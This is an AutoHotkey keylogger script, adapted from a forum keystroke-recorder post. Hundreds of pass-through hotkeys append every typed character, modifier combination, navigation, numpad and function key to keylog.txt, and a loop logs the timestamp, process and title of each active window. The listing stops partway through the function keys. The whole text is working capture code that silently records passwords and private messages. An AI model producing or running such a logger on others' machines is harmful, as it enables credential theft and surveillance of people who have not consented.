; modified from: 
; http://www.autohotkey.com/board/topic/30294-simple-key-stroke-recorder/
;

#NoEnv ; Recommended for performance and compatibility with future AutoHotkey releases.

mouseevent(message) {
    MouseGetPos, x, y, window, controln
    WinGetActiveTitle, Title
    WinGet, ProcessName, ProcessName, A
    FileAppend, `n{%message%} %x% %y% %ProcessName%: %Title%`n, *keylog.txt
}

Loop {
    WinWaitNotActive, % "ahk_id " WinActive("A")
    WinGetActiveTitle, Title
    WinGet, ProcessName, ProcessName, A
    FormatTime, time, , yyyy-MM-dd-HH:mm:ss
    FileAppend, `n%time% %ProcessName%: %Title%`n, *keylog.txt
}

~a::FileAppend, a, *keylog.txt
~#a::FileAppend, a, *keylog.txt
~!a::FileAppend, a, *keylog.txt
~^a::FileAppend, a, *keylog.txt
~b::FileAppend, b, *keylog.txt
~#b::FileAppend, b, *keylog.txt
~!b::FileAppend, b, *keylog.txt
~^b::FileAppend, b, *keylog.txt
~c::FileAppend, c, *keylog.txt
~#c::FileAppend, c, *keylog.txt
~!c::FileAppend, c, *keylog.txt
~^c::FileAppend, c, *keylog.txt
~d::FileAppend, d, *keylog.txt
~#d::FileAppend, d, *keylog.txt
~!d::FileAppend, d, *keylog.txt
~^d::FileAppend, d, *keylog.txt
~e::FileAppend, e, *keylog.txt
~#e::FileAppend, e, *keylog.txt
~!e::FileAppend, e, *keylog.txt
~^e::FileAppend, e, *keylog.txt
~f::FileAppend, f, *keylog.txt
~#f::FileAppend, f, *keylog.txt
~!f::FileAppend, f, *keylog.txt
~^f::FileAppend, f, *keylog.txt
~g::FileAppend, g, *keylog.txt
~#g::FileAppend, g, *keylog.txt
~!g::FileAppend, g, *keylog.txt
~^g::FileAppend, g, *keylog.txt
~h::FileAppend, h, *keylog.txt
~#h::FileAppend, h, *keylog.txt
~!h::FileAppend, h, *keylog.txt
~^h::FileAppend, h, *keylog.txt
~i::FileAppend, i, *keylog.txt
~#i::FileAppend, i, *keylog.txt
~!i::FileAppend, i, *keylog.txt
~^i::FileAppend, i, *keylog.txt
~j::FileAppend, j, *keylog.txt
~#j::FileAppend, j, *keylog.txt
~!j::FileAppend, j, *keylog.txt
~^j::FileAppend, j, *keylog.txt
~k::FileAppend, k, *keylog.txt
~#k::FileAppend, k, *keylog.txt
~!k::FileAppend, k, *keylog.txt
~^k::FileAppend, k, *keylog.txt
~l::FileAppend, l, *keylog.txt
~#l::FileAppend, l, *keylog.txt
~!l::FileAppend, l, *keylog.txt
~^l::FileAppend, l, *keylog.txt
~m::FileAppend, m, *keylog.txt
~#m::FileAppend, m, *keylog.txt
~!m::FileAppend, m, *keylog.txt
~^m::FileAppend, m, *keylog.txt
~n::FileAppend, n, *keylog.txt
~#n::FileAppend, n, *keylog.txt
~!n::FileAppend, n, *keylog.txt
~^n::FileAppend, n, *keylog.txt
~o::FileAppend, o, *keylog.txt
~#o::FileAppend, o, *keylog.txt
~!o::FileAppend, o, *keylog.txt
~^o::FileAppend, o, *keylog.txt
~p::FileAppend, p, *keylog.txt
~#p::FileAppend, p, *keylog.txt
~!p::FileAppend, p, *keylog.txt
~^p::FileAppend, p, *keylog.txt
~q::FileAppend, q, *keylog.txt
~#q::FileAppend, q, *keylog.txt
~!q::FileAppend, q, *keylog.txt
~^q::FileAppend, q, *keylog.txt
~r::FileAppend, r, *keylog.txt
~#r::FileAppend, r, *keylog.txt
~!r::FileAppend, r, *keylog.txt
~^r::FileAppend, r, *keylog.txt
~s::FileAppend, s, *keylog.txt
~#s::FileAppend, s, *keylog.txt
~!s::FileAppend, s, *keylog.txt
~^s::FileAppend, s, *keylog.txt
~t::FileAppend, t, *keylog.txt
~#t::FileAppend, t, *keylog.txt
~!t::FileAppend, t, *keylog.txt
~^t::FileAppend, t, *keylog.txt
~u::FileAppend, u, *keylog.txt
~#u::FileAppend, u, *keylog.txt
~!u::FileAppend, u, *keylog.txt
~^u::FileAppend, u, *keylog.txt
~v::FileAppend, v, *keylog.txt
~#v::FileAppend, v, *keylog.txt
~!v::FileAppend, v, *keylog.txt
~^v::FileAppend, v, *keylog.txt
~w::FileAppend, w, *keylog.txt
~#w::FileAppend, w, *keylog.txt
~!w::FileAppend, w, *keylog.txt
~^w::FileAppend, w, *keylog.txt
~x::FileAppend, x, *keylog.txt
~#x::FileAppend, x, *keylog.txt
~!x::FileAppend, x, *keylog.txt
~^x::FileAppend, x, *keylog.txt
~y::FileAppend, y, *keylog.txt
~#y::FileAppend, y, *keylog.txt
~!y::FileAppend, y, *keylog.txt
~^y::FileAppend, y, *keylog.txt
~z::FileAppend, z, *keylog.txt
~#z::FileAppend, z, *keylog.txt
~!z::FileAppend, z, *keylog.txt
~^z::FileAppend, z, *keylog.txt
~+A::FileAppend, A, *keylog.txt
~#+A::FileAppend, A, *keylog.txt
~!+A::FileAppend, A, *keylog.txt
~^+A::FileAppend, A, *keylog.txt
~+B::FileAppend, B, *keylog.txt
~#+B::FileAppend, B, *keylog.txt
~!+B::FileAppend, B, *keylog.txt
~^+B::FileAppend, B, *keylog.txt
~+C::FileAppend, C, *keylog.txt
~#+C::FileAppend, C, *keylog.txt
~!+C::FileAppend, C, *keylog.txt
~^+C::FileAppend, C, *keylog.txt
~+D::FileAppend, D, *keylog.txt
~#+D::FileAppend, D, *keylog.txt
~!+D::FileAppend, D, *keylog.txt
~^+D::FileAppend, D, *keylog.txt
~+E::FileAppend, E, *keylog.txt
~#+E::FileAppend, E, *keylog.txt
~!+E::FileAppend, E, *keylog.txt
~^+E::FileAppend, E, *keylog.txt
~+F::FileAppend, F, *keylog.txt
~#+F::FileAppend, F, *keylog.txt
~!+F::FileAppend, F, *keylog.txt
~^+F::FileAppend, F, *keylog.txt
~+G::FileAppend, G, *keylog.txt
~#+G::FileAppend, G, *keylog.txt
~!+G::FileAppend, G, *keylog.txt
~^+G::FileAppend, G, *keylog.txt
~+H::FileAppend, H, *keylog.txt
~#+H::FileAppend, H, *keylog.txt
~!+H::FileAppend, H, *keylog.txt
~^+H::FileAppend, H, *keylog.txt
~+I::FileAppend, I, *keylog.txt
~#+I::FileAppend, I, *keylog.txt
~!+I::FileAppend, I, *keylog.txt
~^+I::FileAppend, I, *keylog.txt
~+J::FileAppend, J, *keylog.txt
~#+J::FileAppend, J, *keylog.txt
~!+J::FileAppend, J, *keylog.txt
~^+J::FileAppend, J, *keylog.txt
~+K::FileAppend, K, *keylog.txt
~#+K::FileAppend, K, *keylog.txt
~!+K::FileAppend, K, *keylog.txt
~^+K::FileAppend, K, *keylog.txt
~+L::FileAppend, L, *keylog.txt
~#+L::FileAppend, L, *keylog.txt
~!+L::FileAppend, L, *keylog.txt
~^+L::FileAppend, L, *keylog.txt
~+M::FileAppend, M, *keylog.txt
~#+M::FileAppend, M, *keylog.txt
~!+M::FileAppend, M, *keylog.txt
~^+M::FileAppend, M, *keylog.txt
~+N::FileAppend, N, *keylog.txt
~#+N::FileAppend, N, *keylog.txt
~!+N::FileAppend, N, *keylog.txt
~^+N::FileAppend, N, *keylog.txt
~+O::FileAppend, O, *keylog.txt
~#+O::FileAppend, O, *keylog.txt
~!+O::FileAppend, O, *keylog.txt
~^+O::FileAppend, O, *keylog.txt
~+P::FileAppend, P, *keylog.txt
~#+P::FileAppend, P, *keylog.txt
~!+P::FileAppend, P, *keylog.txt
~^+P::FileAppend, P, *keylog.txt
~+Q::FileAppend, Q, *keylog.txt
~#+Q::FileAppend, Q, *keylog.txt
~!+Q::FileAppend, Q, *keylog.txt
~^+Q::FileAppend, Q, *keylog.txt
~+R::FileAppend, R, *keylog.txt
~#+R::FileAppend, R, *keylog.txt
~!+R::FileAppend, R, *keylog.txt
~^+R::FileAppend, R, *keylog.txt
~+S::FileAppend, S, *keylog.txt
~#+S::FileAppend, S, *keylog.txt
~!+S::FileAppend, S, *keylog.txt
~^+S::FileAppend, S, *keylog.txt
~+T::FileAppend, T, *keylog.txt
~#+T::FileAppend, T, *keylog.txt
~!+T::FileAppend, T, *keylog.txt
~^+T::FileAppend, T, *keylog.txt
~+U::FileAppend, U, *keylog.txt
~#+U::FileAppend, U, *keylog.txt
~!+U::FileAppend, U, *keylog.txt
~^+U::FileAppend, U, *keylog.txt
~+V::FileAppend, V, *keylog.txt
~#+V::FileAppend, V, *keylog.txt
~!+V::FileAppend, V, *keylog.txt
~^+V::FileAppend, V, *keylog.txt
~+W::FileAppend, W, *keylog.txt
~#+W::FileAppend, W, *keylog.txt
~!+W::FileAppend, W, *keylog.txt
~^+W::FileAppend, W, *keylog.txt
~+X::FileAppend, X, *keylog.txt
~#+X::FileAppend, X, *keylog.txt
~!+X::FileAppend, X, *keylog.txt
~^+X::FileAppend, X, *keylog.txt
~+Y::FileAppend, Y, *keylog.txt
~#+Y::FileAppend, Y, *keylog.txt
~!+Y::FileAppend, Y, *keylog.txt
~^+Y::FileAppend, Y, *keylog.txt
~+Z::FileAppend, Z, *keylog.txt
~#+Z::FileAppend, Z, *keylog.txt
~!+Z::FileAppend, Z, *keylog.txt
~^+Z::FileAppend, Z, *keylog.txt
~`::FileAppend, ``, *keylog.txt
~#`::FileAppend, ``, *keylog.txt
~!`::FileAppend, ``, *keylog.txt
~^`::FileAppend, ``, *keylog.txt
~!::FileAppend, !, *keylog.txt
~#!::FileAppend, !, *keylog.txt
~!!::FileAppend, !, *keylog.txt
~^!::FileAppend, !, *keylog.txt
~@::FileAppend, @, *keylog.txt
~#@::FileAppend, @, *keylog.txt
~!@::FileAppend, @, *keylog.txt
~^@::FileAppend, @, *keylog.txt
~#::FileAppend, #, *keylog.txt
~##::FileAppend, #, *keylog.txt
~!#::FileAppend, #, *keylog.txt
~^#::FileAppend, #, *keylog.txt
~$::FileAppend, $, *keylog.txt
~#$::FileAppend, $, *keylog.txt
~!$::FileAppend, $, *keylog.txt
~^$::FileAppend, $, *keylog.txt
~^::FileAppend, ^, *keylog.txt
~#^::FileAppend, ^, *keylog.txt
~!^::FileAppend, ^, *keylog.txt
~^^::FileAppend, ^, *keylog.txt
~&::FileAppend, &, *keylog.txt
~#&::FileAppend, &, *keylog.txt
~!&::FileAppend, &, *keylog.txt
~^&::FileAppend, &, *keylog.txt
~*::FileAppend, *, *keylog.txt
~#*::FileAppend, *, *keylog.txt
~!*::FileAppend, *, *keylog.txt
~^*::FileAppend, *, *keylog.txt
~(::FileAppend, (, *keylog.txt
~#(::FileAppend, (, *keylog.txt
~!(::FileAppend, (, *keylog.txt
~^(::FileAppend, (, *keylog.txt
~)::FileAppend, ), *keylog.txt
~#)::FileAppend, ), *keylog.txt
~!)::FileAppend, ), *keylog.txt
~^)::FileAppend, ), *keylog.txt
~-::FileAppend, -, *keylog.txt
~#-::FileAppend, -, *keylog.txt
~!-::FileAppend, -, *keylog.txt
~^-::FileAppend, -, *keylog.txt
~_::FileAppend, _, *keylog.txt
~#_::FileAppend, _, *keylog.txt
~!_::FileAppend, _, *keylog.txt
~^_::FileAppend, _, *keylog.txt
~=::FileAppend, =, *keylog.txt
~#=::FileAppend, =, *keylog.txt
~!=::FileAppend, =, *keylog.txt
~^=::FileAppend, =, *keylog.txt
~+::FileAppend, +, *keylog.txt
~#+::FileAppend, +, *keylog.txt
~!+::FileAppend, +, *keylog.txt
~^+::FileAppend, +, *keylog.txt
~[::FileAppend, [, *keylog.txt
~#[::FileAppend, [, *keylog.txt
~![::FileAppend, [, *keylog.txt
~^[::FileAppend, [, *keylog.txt
~{::FileAppend, {, *keylog.txt
~#{::FileAppend, {, *keylog.txt
~!{::FileAppend, {, *keylog.txt
~^{::FileAppend, {, *keylog.txt
~]::FileAppend, ], *keylog.txt
~#]::FileAppend, ], *keylog.txt
~!]::FileAppend, ], *keylog.txt
~^]::FileAppend, ], *keylog.txt
~}::FileAppend, }, *keylog.txt
~#}::FileAppend, }, *keylog.txt
~!}::FileAppend, }, *keylog.txt
~^}::FileAppend, }, *keylog.txt
~\::FileAppend, \, *keylog.txt
~#\::FileAppend, \, *keylog.txt
~!\::FileAppend, \, *keylog.txt
~^\::FileAppend, \, *keylog.txt
~|::FileAppend, |, *keylog.txt
~#|::FileAppend, |, *keylog.txt
~!|::FileAppend, |, *keylog.txt
~^|::FileAppend, |, *keylog.txt
~+;::FileAppend, :, *keylog.txt
~#+;::FileAppend, :, *keylog.txt
~!+;::FileAppend, :, *keylog.txt
~^+;::FileAppend, :, *keylog.txt
~;::FileAppend, `;, *keylog.txt
~#;::FileAppend, `;, *keylog.txt
~!;::FileAppend, `;, *keylog.txt
~^;::FileAppend, `;, *keylog.txt
~SC028::FileAppend, ', *keylog.txt
~#SC028::FileAppend, ', *keylog.txt
~!SC028::FileAppend, ', *keylog.txt
~^SC028::FileAppend, ', *keylog.txt
~+SC028::FileAppend, ", *keylog.txt
~#+SC028::FileAppend, ", *keylog.txt
~!+SC028::FileAppend, ", *keylog.txt
~^+SC028::FileAppend, ", *keylog.txt
~,::FileAppend, {comma}, *keylog.txt
~#,::FileAppend, {comma}, *keylog.txt
~!,::FileAppend, {comma}, *keylog.txt
~^,::FileAppend, {comma}, *keylog.txt
~.::FileAppend, ., *keylog.txt
~#.::FileAppend, ., *keylog.txt
~!.::FileAppend, ., *keylog.txt
~^.::FileAppend, ., *keylog.txt
~<::FileAppend, <, *keylog.txt
~#<::FileAppend, <, *keylog.txt
~!<::FileAppend, <, *keylog.txt
~^<::FileAppend, <, *keylog.txt
~>::FileAppend, >, *keylog.txt
~#>::FileAppend, >, *keylog.txt
~!>::FileAppend, >, *keylog.txt
~^>::FileAppend, >, *keylog.txt
~/::FileAppend, /, *keylog.txt
~#/::FileAppend, /, *keylog.txt
~!/::FileAppend, /, *keylog.txt
~^/::FileAppend, /, *keylog.txt
~?::FileAppend, ?, *keylog.txt
~#?::FileAppend, ?, *keylog.txt
~!?::FileAppend, ?, *keylog.txt
~^?::FileAppend, ?, *keylog.txt
~1::FileAppend, 1, *keylog.txt
~#1::FileAppend, 1, *keylog.txt
~!1::FileAppend, 1, *keylog.txt
~^1::FileAppend, 1, *keylog.txt
~2::FileAppend, 2, *keylog.txt
~#2::FileAppend, 2, *keylog.txt
~!2::FileAppend, 2, *keylog.txt
~^2::FileAppend, 2, *keylog.txt
~3::FileAppend, 3, *keylog.txt
~#3::FileAppend, 3, *keylog.txt
~!3::FileAppend, 3, *keylog.txt
~^3::FileAppend, 3, *keylog.txt
~4::FileAppend, 4, *keylog.txt
~#4::FileAppend, 4, *keylog.txt
~!4::FileAppend, 4, *keylog.txt
~^4::FileAppend, 4, *keylog.txt
~5::FileAppend, 5, *keylog.txt
~#5::FileAppend, 5, *keylog.txt
~!5::FileAppend, 5, *keylog.txt
~^5::FileAppend, 5, *keylog.txt
~6::FileAppend, 6, *keylog.txt
~#6::FileAppend, 6, *keylog.txt
~!6::FileAppend, 6, *keylog.txt
~^6::FileAppend, 6, *keylog.txt
~7::FileAppend, 7, *keylog.txt
~#7::FileAppend, 7, *keylog.txt
~!7::FileAppend, 7, *keylog.txt
~^7::FileAppend, 7, *keylog.txt
~8::FileAppend, 8, *keylog.txt
~#8::FileAppend, 8, *keylog.txt
~!8::FileAppend, 8, *keylog.txt
~^8::FileAppend, 8, *keylog.txt
~9::FileAppend, 9, *keylog.txt
~#9::FileAppend, 9, *keylog.txt
~!9::FileAppend, 9, *keylog.txt
~^9::FileAppend, 9, *keylog.txt
~0::FileAppend, 0, *keylog.txt
~#0::FileAppend, 0, *keylog.txt
~!0::FileAppend, 0, *keylog.txt
~^0::FileAppend, 0, *keylog.txt
~Space::FileAppend, %A_Space%, *keylog.txt
~#Space::FileAppend, %A_Space%, *keylog.txt
~!Space::FileAppend, %A_Space%, *keylog.txt
~^Space::FileAppend, %A_Space%, *keylog.txt
~Tab::FileAppend, {Tab}, *keylog.txt
~#Tab::FileAppend, {Tab}, *keylog.txt
~!Tab::FileAppend, {Tab}, *keylog.txt
~^Tab::FileAppend, {Tab}, *keylog.txt
~Enter::FileAppend, {Enter}`n, *keylog.txt
~#Enter::FileAppend, {Enter}`n, *keylog.txt
~!Enter::FileAppend, {Enter}`n, *keylog.txt
~^Enter::FileAppend, {Enter}`n, *keylog.txt
~Esc::FileAppend, {Esc}, *keylog.txt
~#Esc::FileAppend, {Esc}, *keylog.txt
~!Esc::FileAppend, {Esc}, *keylog.txt
~^Esc::FileAppend, {Esc}, *keylog.txt
~SC00E::FileAppend, {BS}, *keylog.txt
~#SC00E::FileAppend, {BS}, *keylog.txt
~!SC00E::FileAppend, {BS}, *keylog.txt
~^SC00E::FileAppend, {BS}, *keylog.txt
~Pause::FileAppend, {Pause}, *keylog.txt
~#Pause::FileAppend, {Pause}, *keylog.txt
~!Pause::FileAppend, {Pause}, *keylog.txt
~^Pause::FileAppend, {Pause}, *keylog.txt
~ScrollLock::FileAppend, {ScrollLock}, *keylog.txt
~#ScrollLock::FileAppend, {ScrollLock}, *keylog.txt
~!ScrollLock::FileAppend, {ScrollLock}, *keylog.txt
~^ScrollLock::FileAppend, {ScrollLock}, *keylog.txt
~Delete::FileAppend, {Delete}, *keylog.txt
~#Delete::FileAppend, {Delete}, *keylog.txt
~!Delete::FileAppend, {Delete}, *keylog.txt
~^Delete::FileAppend, {Delete}, *keylog.txt
~Insert::FileAppend, {Insert}, *keylog.txt
~#Insert::FileAppend, {Insert}, *keylog.txt
~!Insert::FileAppend, {Insert}, *keylog.txt
~^Insert::FileAppend, {Insert}, *keylog.txt
~Home::FileAppend, {Home}, *keylog.txt
~#Home::FileAppend, {Home}, *keylog.txt
~!Home::FileAppend, {Home}, *keylog.txt
~^Home::FileAppend, {Home}, *keylog.txt
~End::FileAppend, {End}, *keylog.txt
~#End::FileAppend, {End}, *keylog.txt
~!End::FileAppend, {End}, *keylog.txt
~^End::FileAppend, {End}, *keylog.txt
~PgUp::FileAppend, {PgUp}, *keylog.txt
~#PgUp::FileAppend, {PgUp}, *keylog.txt
~!PgUp::FileAppend, {PgUp}, *keylog.txt
~^PgUp::FileAppend, {PgUp}, *keylog.txt
~PgDn::FileAppend, {PgDn}, *keylog.txt
~#PgDn::FileAppend, {PgDn}, *keylog.txt
~!PgDn::FileAppend, {PgDn}, *keylog.txt
~^PgDn::FileAppend, {PgDn}, *keylog.txt
~Up::FileAppend, {Up}, *keylog.txt
~#Up::FileAppend, {Up}, *keylog.txt
~!Up::FileAppend, {Up}, *keylog.txt
~^Up::FileAppend, {Up}, *keylog.txt
~Down::FileAppend, {Down}, *keylog.txt
~#Down::FileAppend, {Down}, *keylog.txt
~!Down::FileAppend, {Down}, *keylog.txt
~^Down::FileAppend, {Down}, *keylog.txt
~Left::FileAppend, {Left}, *keylog.txt
~#Left::FileAppend, {Left}, *keylog.txt
~!Left::FileAppend, {Left}, *keylog.txt
~^Left::FileAppend, {Left}, *keylog.txt
~Right::FileAppend, {Right}, *keylog.txt
~#Right::FileAppend, {Right}, *keylog.txt
~!Right::FileAppend, {Right}, *keylog.txt
~^Right::FileAppend, {Right}, *keylog.txt
~CapsLock::FileAppend, {CapsLock}, *keylog.txt
~#CapsLock::FileAppend, {CapsLock}, *keylog.txt
~!CapsLock::FileAppend, {CapsLock}, *keylog.txt
~^CapsLock::FileAppend, {CapsLock}, *keylog.txt
~NumLock::FileAppend, {NumLock}, *keylog.txt
~#NumLock::FileAppend, {NumLock}, *keylog.txt
~!NumLock::FileAppend, {NumLock}, *keylog.txt
~^NumLock::FileAppend, {NumLock}, *keylog.txt
~Numpad0::FileAppend, {Numpad0}, *keylog.txt
~#Numpad0::FileAppend, {Numpad0}, *keylog.txt
~!Numpad0::FileAppend, {Numpad0}, *keylog.txt
~^Numpad0::FileAppend, {Numpad0}, *keylog.txt
~Numpad1::FileAppend, {Numpad1}, *keylog.txt
~#Numpad1::FileAppend, {Numpad1}, *keylog.txt
~!Numpad1::FileAppend, {Numpad1}, *keylog.txt
~^Numpad1::FileAppend, {Numpad1}, *keylog.txt
~Numpad2::FileAppend, {Numpad2}, *keylog.txt
~#Numpad2::FileAppend, {Numpad2}, *keylog.txt
~!Numpad2::FileAppend, {Numpad2}, *keylog.txt
~^Numpad2::FileAppend, {Numpad2}, *keylog.txt
~Numpad3::FileAppend, {Numpad3}, *keylog.txt
~#Numpad3::FileAppend, {Numpad3}, *keylog.txt
~!Numpad3::FileAppend, {Numpad3}, *keylog.txt
~^Numpad3::FileAppend, {Numpad3}, *keylog.txt
~Numpad4::FileAppend, {Numpad4}, *keylog.txt
~#Numpad4::FileAppend, {Numpad4}, *keylog.txt
~!Numpad4::FileAppend, {Numpad4}, *keylog.txt
~^Numpad4::FileAppend, {Numpad4}, *keylog.txt
~Numpad5::FileAppend, {Numpad5}, *keylog.txt
~#Numpad5::FileAppend, {Numpad5}, *keylog.txt
~!Numpad5::FileAppend, {Numpad5}, *keylog.txt
~^Numpad5::FileAppend, {Numpad5}, *keylog.txt
~Numpad6::FileAppend, {Numpad6}, *keylog.txt
~#Numpad6::FileAppend, {Numpad6}, *keylog.txt
~!Numpad6::FileAppend, {Numpad6}, *keylog.txt
~^Numpad6::FileAppend, {Numpad6}, *keylog.txt
~Numpad7::FileAppend, {Numpad7}, *keylog.txt
~#Numpad7::FileAppend, {Numpad7}, *keylog.txt
~!Numpad7::FileAppend, {Numpad7}, *keylog.txt
~^Numpad7::FileAppend, {Numpad7}, *keylog.txt
~Numpad8::FileAppend, {Numpad8}, *keylog.txt
~#Numpad8::FileAppend, {Numpad8}, *keylog.txt
~!Numpad8::FileAppend, {Numpad8}, *keylog.txt
~^Numpad8::FileAppend, {Numpad8}, *keylog.txt
~Numpad9::FileAppend, {Numpad9}, *keylog.txt
~#Numpad9::FileAppend, {Numpad9}, *keylog.txt
~!Numpad9::FileAppend, {Numpad9}, *keylog.txt
~^Numpad9::FileAppend, {Numpad9}, *keylog.txt
~NumpadAdd::FileAppend, {NumpadAdd}, *keylog.txt
~#NumpadAdd::FileAppend, {NumpadAdd}, *keylog.txt
~!NumpadAdd::FileAppend, {NumpadAdd}, *keylog.txt
~^NumpadAdd::FileAppend, {NumpadAdd}, *keylog.txt
~NumpadClear::FileAppend, {NumpadClear}, *keylog.txt
~#NumpadClear::FileAppend, {NumpadClear}, *keylog.txt
~!NumpadClear::FileAppend, {NumpadClear}, *keylog.txt
~^NumpadClear::FileAppend, {NumpadClear}, *keylog.txt
~NumpadDel::FileAppend, {NumpadDel}, *keylog.txt
~#NumpadDel::FileAppend, {NumpadDel}, *keylog.txt
~!NumpadDel::FileAppend, {NumpadDel}, *keylog.txt
~^NumpadDel::FileAppend, {NumpadDel}, *keylog.txt
~NumpadDiv::FileAppend, {NumpadDiv}, *keylog.txt
~#NumpadDiv::FileAppend, {NumpadDiv}, *keylog.txt
~!NumpadDiv::FileAppend, {NumpadDiv}, *keylog.txt
~^NumpadDiv::FileAppend, {NumpadDiv}, *keylog.txt
~NumpadDot::FileAppend, {NumpadDot}, *keylog.txt
~#NumpadDot::FileAppend, {NumpadDot}, *keylog.txt
~!NumpadDot::FileAppend, {NumpadDot}, *keylog.txt
~^NumpadDot::FileAppend, {NumpadDot}, *keylog.txt
~NumpadDown::FileAppend, {NumpadDown}, *keylog.txt
~#NumpadDown::FileAppend, {NumpadDown}, *keylog.txt
~!NumpadDown::FileAppend, {NumpadDown}, *keylog.txt
~^NumpadDown::FileAppend, {NumpadDown}, *keylog.txt
~NumpadEnd::FileAppend, {NumpadEnd}, *keylog.txt
~#NumpadEnd::FileAppend, {NumpadEnd}, *keylog.txt
~!NumpadEnd::FileAppend, {NumpadEnd}, *keylog.txt
~^NumpadEnd::FileAppend, {NumpadEnd}, *keylog.txt
~NumpadEnter::FileAppend, {NumpadEnter}, *keylog.txt
~#NumpadEnter::FileAppend, {NumpadEnter}, *keylog.txt
~!NumpadEnter::FileAppend, {NumpadEnter}, *keylog.txt
~^NumpadEnter::FileAppend, {NumpadEnter}, *keylog.txt
~NumpadHome::FileAppend, {NumpadHome}, *keylog.txt
~#NumpadHome::FileAppend, {NumpadHome}, *keylog.txt
~!NumpadHome::FileAppend, {NumpadHome}, *keylog.txt
~^NumpadHome::FileAppend, {NumpadHome}, *keylog.txt
~NumpadIns::FileAppend, {NumpadIns}, *keylog.txt
~#NumpadIns::FileAppend, {NumpadIns}, *keylog.txt
~!NumpadIns::FileAppend, {NumpadIns}, *keylog.txt
~^NumpadIns::FileAppend, {NumpadIns}, *keylog.txt
~NumpadLeft::FileAppend, {NumpadLeft}, *keylog.txt
~#NumpadLeft::FileAppend, {NumpadLeft}, *keylog.txt
~!NumpadLeft::FileAppend, {NumpadLeft}, *keylog.txt
~^NumpadLeft::FileAppend, {NumpadLeft}, *keylog.txt
~NumpadMult::FileAppend, {NumpadMult}, *keylog.txt
~#NumpadMult::FileAppend, {NumpadMult}, *keylog.txt
~!NumpadMult::FileAppend, {NumpadMult}, *keylog.txt
~^NumpadMult::FileAppend, {NumpadMult}, *keylog.txt
~NumpadPgDn::FileAppend, {NumpadPgDn}, *keylog.txt
~#NumpadPgDn::FileAppend, {NumpadPgDn}, *keylog.txt
~!NumpadPgDn::FileAppend, {NumpadPgDn}, *keylog.txt
~^NumpadPgDn::FileAppend, {NumpadPgDn}, *keylog.txt
~NumpadPgUp::FileAppend, {NumpadPgUp}, *keylog.txt
~#NumpadPgUp::FileAppend, {NumpadPgUp}, *keylog.txt
~!NumpadPgUp::FileAppend, {NumpadPgUp}, *keylog.txt
~^NumpadPgUp::FileAppend, {NumpadPgUp}, *keylog.txt
~NumpadRight::FileAppend, {NumpadRight}, *keylog.txt
~#NumpadRight::FileAppend, {NumpadRight}, *keylog.txt
~!NumpadRight::FileAppend, {NumpadRight}, *keylog.txt
~^NumpadRight::FileAppend, {NumpadRight}, *keylog.txt
~NumpadSub::FileAppend, {NumpadSub}, *keylog.txt
~#NumpadSub::FileAppend, {NumpadSub}, *keylog.txt
~!NumpadSub::FileAppend, {NumpadSub}, *keylog.txt
~^NumpadSub::FileAppend, {NumpadSub}, *keylog.txt
~NumpadUp::FileAppend, {NumpadUp}, *keylog.txt
~#NumpadUp::FileAppend, {NumpadUp}, *keylog.txt
~!NumpadUp::FileAppend, {NumpadUp}, *keylog.txt
~^NumpadUp::FileAppend, {NumpadUp}, *keylog.txt
~F1::FileAppend, {F1}, *keylog.txt
~#F1::FileAppend, {F1}, *keylog.txt
~!F1::FileAppend, {F1}, *keylog.txt
~^F1::FileAppend, {F1}, *keylog.txt
~F2::FileAppend, {F2}, *keylog.txt
~#F2::FileAppend, {F2}, *keylog.txt
~!F2::FileAppend, {F2}, *keylog.txt
~^F2::FileAppend, {F2}, *keylog.txt
~F3::FileAppend, {F3}, *keylog.txt
~#F3::FileAppend, {F3}, *keylog.txt
~!F3::FileAppend, {F3}, *keylog.txt
~^F3::FileAppend, {F3}, *keylog.txt
~F4::FileAppend, {F4}, *keylog.txt
~#F4::FileAppend, {F4}, *keylog.txt
~!F4::FileAppend, {F4}, *keylog.txt
~^F4::FileAppend, {F4}, *keylog.txt
~F5::FileAppend, {F5}, *keylog.txt
~#F5::FileAppend, {F5}, *keylog.txt
~!F5::FileAppend, {F5}, *keylog.txt
~^F5::FileAppend, {F5}, *keylog.txt
~F6::FileAppend, {F6}, *keylog.txt
~#F6::FileAppend, {F6}, *keylog.txt
~!F6::FileAppend, {F6}, *keylog.txt
~^F6::FileAppend, {F6}, *keylog.txt
~F7::FileAppend, {F7}, *keylog.txt
~#F7::FileAppend, {F7}, *keylog.txt
~!F7::FileAppend, {F7}, *keylog.txt
~^F7::FileAppend, {F7}, *keylog.txt
~F8::FileAppend, {F8}, *keylog.txt
~#F8::FileAppend, {F8}, *keylog.txt
~!F8::FileAppend, {F8}, *keylog.txt
~^F8::FileAppend, {F8}, *keylog.txt
~F9::FileAppend, {F9}, *keylog.txt
~#F9::FileAppend, {F9}, *keylog.txt
~!F9::FileAppend, {F9}, *keylog.txt
~^F9::FileAppend, {F9}, *keylog.txt
~F10::FileAppend, {F10}, *keylog.txt
~#F10::FileAppend, {F10}, *keylog.txt
~!F10::FileAppend, {F10}, *keylog.txt
~^F10::FileAppend, {F10}, *keylog.txt
~F11::FileAppend, {F11}, *keylog.txt
~#F11::FileAppend, {F11}, *keylog.txt
~!F11::FileAppend, {F11}, *keylog.txt
~^F11::FileAppend, {F11}, *keylog.txt
~F12::FileAppend, {F12}, *keylog.txt
~#F12::FileAppend, {F12}, *keylog.txt
~!F12::FileAppend, {F12}, *keylog.txt
~^F12::FileAppend, {F12}, *keylog.txt
~F13::FileAppend, {F13}, *keylog.txt
~#F13::FileAppend, {F13}, *keylog.txt
~!F13::FileAppend, {F13}, *keylog.txt
~^F13::FileAppend, {F13}, *keylog.txt
~F14::FileAppend, {F14}, *keylog.txt
~#F14::FileAppend, {F14}, *keylog.txt
~!F14::FileAppend, {F14}, *keylog.txt
~^F14::FileAppend, {F14}, *keylog.txt
~F15::FileAppend, {F15}, *keylog.txt
~#F15::FileAppend, {F15}, *keylog.txt
~!F15::FileAppend, {F15}, *keylog.txt
~^F15::FileAppend, {F15}, *keylog.txt
~F16::FileAppend, {F16}, *keylog.txt
~#F16::FileAppend, {F16}, *keylog.txt
~!F16::FileAppend, {F16}, *keylog.txt
~^F16::FileAppend, {F16}, *keylog.txt
~F17::FileAppend, {F17}, *keylog.txt
~#F17::FileAppend, {F17}, *keylog.txt
~!F17::FileAppend, {F17}, *keylog.txt
~^F17::FileAppend, {F17}, *keylog.txt
~F18::FileAppend, {F18}, *keylog.txt
~#F18::FileAppend, {F18}, *keylog.txt
~!F18::FileAppend, {F18}, *keylog.txt
~^F18::FileAppend, {F18}, *keylog.txt
~F19::FileAppend, {F19}, *keylog.txt
~#F19::FileAppend, {F19}, *keylog.txt
~!F19::FileAppend, {F19}, *keylog.txt
